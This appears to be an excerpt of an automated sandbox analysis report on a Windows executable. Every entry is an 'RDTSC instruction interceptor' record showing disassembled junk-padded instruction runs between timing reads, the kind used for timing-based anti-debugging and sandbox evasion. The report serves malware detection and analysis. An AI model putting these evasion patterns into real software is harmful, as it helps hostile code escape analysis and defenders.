Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF50A second address: 4DF514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF514 second address: 4DF52A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD180B5C15Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE50D second address: 4EE517 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE517 second address: 4EE523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC6A8 second address: 4EC6C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED54Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC3B second address: 4ECC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC3F second address: 4ECC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FD1807ED550h 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC57 second address: 4ECC6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Eh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC6E second address: 4ECC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 jnp 00007FD1807ED546h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECC9A second address: 4ECCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD180B5C156h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C162h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCB9 second address: 4ECCBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCBD second address: 4ECCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCD4 second address: 4ECCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCD8 second address: 4ECCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ECCDC second address: 4ECCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4ED409 second address: 4ED416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD180B5C156h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EE36B second address: 4EE3A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD1807ED546h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FD1807ED546h 0x00000013 popad 0x00000014 jmp 00007FD1807ED555h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED54Bh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC173 second address: 4EC177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC177 second address: 4EC197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 jo 00007FD1807ED546h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC197 second address: 4EC1A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD180B5C158h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4EC1A5 second address: 4EC1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42E5DA second address: 42E5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42E5DE second address: 42E5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3BB5 second address: 4F3BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3BBB second address: 4F3BD3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F3EA2 second address: 4F3EA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F64AE second address: 4F64E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED551h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED550h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4F64E2 second address: 4F64E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 50190E second address: 50193C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007FD1807ED551h 0x0000000b jmp 00007FD1807ED54Bh 0x00000010 pushad 0x00000011 jmp 00007FD1807ED54Ch 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 jo 00007FD1807ED54Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 504C64 second address: 504C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5086CB second address: 508718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Ch 0x00000011 jc 00007FD1807ED56Bh 0x00000017 jmp 00007FD1807ED555h 0x0000001c jmp 00007FD1807ED550h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080AF second address: 5080B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080B3 second address: 5080C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5080C3 second address: 5080C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B106 second address: 51B11F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FD1807ED56Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B11F second address: 51B125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B125 second address: 51B138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD1807ED546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 51B138 second address: 51B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521DFD second address: 521E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FD1807ED54Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521E11 second address: 521E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD180B5C167h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521F8C second address: 521F9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FD1807ED546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521F9B second address: 521FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD180B5C156h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 521FA8 second address: 521FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 52214F second address: 522155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522155 second address: 522162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522162 second address: 522168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522403 second address: 522430 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED555h 0x0000000c jmp 00007FD1807ED550h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522430 second address: 522438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522438 second address: 52243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226D8 second address: 5226DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226DC second address: 5226F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FD1807ED546h 0x0000000e jmp 00007FD1807ED54Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5226F4 second address: 522704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 522704 second address: 522715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD1807ED546h 0x00000009 jno 00007FD1807ED546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 524A26 second address: 524A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 5348FE second address: 534906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 534906 second address: 53492E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C165h 0x00000009 jmp 00007FD180B5C15Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 548C7E second address: 548C8E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56632F second address: 566335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 566335 second address: 566345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FD1807ED54Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565227 second address: 565244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD180B5C167h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565244 second address: 565249 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565249 second address: 56525D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD180B5C15Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56565C second address: 565671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565C4D second address: 565C58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565EEF second address: 565F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FD1807ED559h 0x0000000b popad 0x0000000c pushad 0x0000000d js 00007FD1807ED552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F17 second address: 565F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F1D second address: 565F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F25 second address: 565F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 565F2F second address: 565F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FD1807ED546h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A125 second address: 56A12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A20B second address: 56A215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A215 second address: 56A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A702 second address: 56A706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A706 second address: 56A71B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56A71B second address: 56A720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 56DC1D second address: 56DC8D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD180B5C171h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jp 00007FD180B5C198h 0x00000018 jno 00007FD180B5C172h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FD180B5C166h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40108 second address: 4C40162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 adc ch, FFFFFFCEh 0x0000000c jmp 00007FD1807ED559h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007FD1807ED54Ch 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push edi 0x0000001e mov edx, eax 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40162 second address: 4C40169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40169 second address: 4C40186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40186 second address: 4C4018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F50 second address: 4C20F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F54 second address: 4C20F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F71 second address: 4C20F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20F77 second address: 4C20F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70112 second address: 4C701D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD1807ED54Ah 0x00000008 jmp 00007FD1807ED555h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 movzx eax, dx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD1807ED556h 0x0000001d xor eax, 26B64928h 0x00000023 jmp 00007FD1807ED54Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FD1807ED558h 0x0000002f or cx, 7B88h 0x00000034 jmp 00007FD1807ED54Bh 0x00000039 popfd 0x0000003a popad 0x0000003b movzx eax, di 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 jmp 00007FD1807ED54Bh 0x00000045 mov ebp, esp 0x00000047 jmp 00007FD1807ED556h 0x0000004c pop ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD1807ED557h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C701D4 second address: 4C701EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C701EC second address: 4C701F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000CB second address: 4C000DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000DA second address: 4C000F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C000F2 second address: 4C0011B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD180B5C165h 0x00000013 rdtsc
